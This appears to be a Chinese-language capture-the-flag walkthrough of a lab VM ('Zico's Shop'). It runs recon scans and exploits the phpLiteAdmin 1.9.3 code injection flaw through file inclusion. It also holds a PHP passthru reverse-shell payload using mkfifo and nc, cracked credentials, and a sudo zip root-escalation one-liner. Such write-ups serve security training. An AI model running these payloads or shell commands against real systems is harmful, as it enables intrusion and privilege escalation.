信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.134 00:0c:29:a2:4b:6c VMware, Inc.
192.168.12.254 00:50:56:e7:0d:60 VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.134 00:0c:29:a2:4b:6c 1 60 VMware, Inc.
192.168.12.254 00:50:56:e7:0d:60 1 60 VMware, Inc.
3、nmap
主机存活探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:23 CST
Nmap scan report for 192.168.12.1
Host is up (0.0011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000067s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.134
Host is up (0.000097s latency).
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:E7:0D:60 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.39 seconds
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.134 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:23 CST
Nmap scan report for 192.168.12.134
Host is up (0.0012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
57368/tcp open unknown
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.48 seconds
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -PN -O -p 22,80,111,57368 192.168.12.134 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:25 CST
Nmap scan report for 192.168.12.134
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34303/udp6 status
| 100024 1 36261/udp status
| 100024 1 47838/tcp6 status
|_ 100024 1 57368/tcp status
57368/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.04 seconds
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 22,80,111,57368 192.168.12.134 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 14:28 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.134
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/jquery/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/jquery/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/jquery/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/jquery/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.134:80/vendor/bootstrap/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.12.134:80/vendor/bootstrap/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /view/index.shtml: Axis 212 PTZ Network Camera
| /dbadmin/: phpMyAdmin
| /css/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
| /vendor/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /view/: Potentially interesting folder
111/tcp open rpcbind
57368/tcp open unknown
MAC Address: 00:0C:29:A2:4B:6C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 57.08 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.134
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.134
+ Target Hostname: 192.168.12.134
+ Target Port: 80
+ Start Time: 2023-12-16 14:30:30 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Server may leak inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Fri Jun 9 03:18:30 2017. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /view.php?ariadne=http://blog.cirt.net/rfiinc.txt?: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8909 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-12-16 14:30:47 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.134
WhatWeb report for http://192.168.12.134
Status : 200 OK
Title : Zico's Shop
IP : 192.168.12.134
Country : RESERVED, ZZ
Summary : Apache[2.2.22], Bootstrap, Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.2.22 (Ubuntu)], JQuery, Script, X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.22 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : feedback@startbootstrap.com,your-email@your-domain.com
String : your-email@your-domain.com
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.2.22 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 16 Dec 2023 06:31:28 GMT
Server: Apache/2.2.22 (Ubuntu)
Last-Modified: Thu, 08 Jun 2017 19:18:30 GMT
ETag: "3a09c9-1f22-55177b7ccfb97"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2176
Connection: close
Content-Type: text/html
6、masscan
┌──(root㉿ru)-[~/kali]
└─# masscan -p- 192.168.12.134 --rate=10000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-12-16 06:46:29 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 57368/tcp on 192.168.12.134
Discovered open port 22/tcp on 192.168.12.134
Discovered open port 80/tcp on 192.168.12.134
Discovered open port 111/tcp on 192.168.12.134
rate: 0.00-kpps, 100.00% done, waiting 2-secs, found=4
信息收集总结
通过主机探测发现目标主机ip,发现主机开放端口有 22,80,111,57368 端口
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
57368/tcp open status 1 (RPC #100024)
目录探测
1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.134 -x php.txt,html,bak -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.134
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,bak,php.txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 287]
/index.html (Status: 200) [Size: 7970]
/index (Status: 200) [Size: 7970]
/img (Status: 301) [Size: 314] [--> http://192.168.12.134/img/]
/tools.html (Status: 200) [Size: 8355]
/tools (Status: 200) [Size: 8355]
/view (Status: 200) [Size: 0]
/css (Status: 301) [Size: 314] [--> http://192.168.12.134/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.12.134/js/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.12.134/vendor/]
/package (Status: 200) [Size: 789]
/less (Status: 301) [Size: 315] [--> http://192.168.12.134/less/]
/.html (Status: 403) [Size: 287]
/server-status (Status: 403) [Size: 295]
/dbadmin (Status: 301) [Size: 318] [--> http://192.168.12.134/dbadmin/]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.134 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.12.134/_23-12-16_14-51-37.txt
Target: http://192.168.12.134/
[14:51:37] Starting:
[14:51:37] 301 - 245B - /js -> http://192.168.12.134/js/
[14:51:54] 301 - 246B - /css -> http://192.168.12.134/css/
[14:51:54] 301 - 250B - /dbadmin -> http://192.168.12.134/dbadmin/
[14:51:54] 200 - 456B - /dbadmin/
[14:51:58] 200 - 964B - /gulpfile.js
[14:51:59] 301 - 247B - /img -> http://192.168.12.134/img/
[14:52:00] 200 - 468B - /js/
[14:52:01] 200 - 1KB - /LICENSE
[14:52:05] 200 - 789B - /package
[14:52:05] 200 - 789B - /package.json
[14:52:09] 200 - 1KB - /README.md
[14:52:16] 200 - 1KB - /tools
[14:52:17] 200 - 506B - /vendor/
[14:52:18] 200 - 20B - /view.php
Task Completed
3、feroxbuster
同理
4、dirb
同理
WEB
80端口
跳转到这里。主页面经过探测,没啥好利用的!
文件包含
这里经过测试,存在文件包含漏洞!
phpmyadmin
目录 /dbadmin/test_db.php
弱密码admin登录。
得到账号密码:
root 653F4B285089453FE00E2AAFAC573414
zico 96781A607F4E9F5F423AC01F0DAB0EBD
md5解密
root 34kroot34
zico zico2215@
phpLiteAdmin 漏洞利用
1、searchsploit
┌──(root㉿ru)-[~/kali]
└─# searchsploit phpLiteAdmin 1.9.3
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injectio | php/webapps/24044.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 24044.txt
Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
URL: https://www.exploit-db.com/exploits/24044
Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
Codes: OSVDB-89126
Verified: True
File Type: ASCII text
Copied to: /root/kali/24044.txt
2、payload
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux
Description:
phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',
An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.
Proof of Concept:
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
Done!
Proof: http://goo.gl/ZqPVL
3、漏洞利用
反弹shell payload
<?php
passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f");
?>
直接修改原来的表,插入php反弹shell。文件包含访问即可!
访问目录也在首页。我们只需要利用上面的文件包含漏洞进行包含文件即可反弹shell。
4、反弹shell
┌──(root㉿ru)-[~/kali]
└─# nc -nlvp 3366
listening on [any] 3366 ...
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.135] 43023
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
提权
user and pass
www-data@zico:/home/zico/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
在zico目录下找到wordpress目录,进入查看wp-config.php文件发现账号密码
zico sWfCsfJSPV9H3AmQzw8
ssh
┌──(root㉿ru)-[~/kali]
└─# ssh zico@192.168.12.135
The authenticity of host '192.168.12.135 (192.168.12.135)' can't be established.
ECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG/k2igw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.135' (ECDSA) to the list of known hosts.
zico@192.168.12.135's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
zico@zico:~$ id
uid=1000(zico) gid=1000(zico) groups=1000(zico)
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
zico@zico:~$
ssh连接后发现可以进行zip提权。
zico@zico:~$ TF=$(mktemp -u)
zico@zico:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 35%)
# sudo rm $TF
rm: missing operand
Try `rm --help' for more information.
# id
uid=0(root) gid=0(root) groups=0(root)
#
payload
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
get flag
# cd /root
# ls
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
#
2758
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
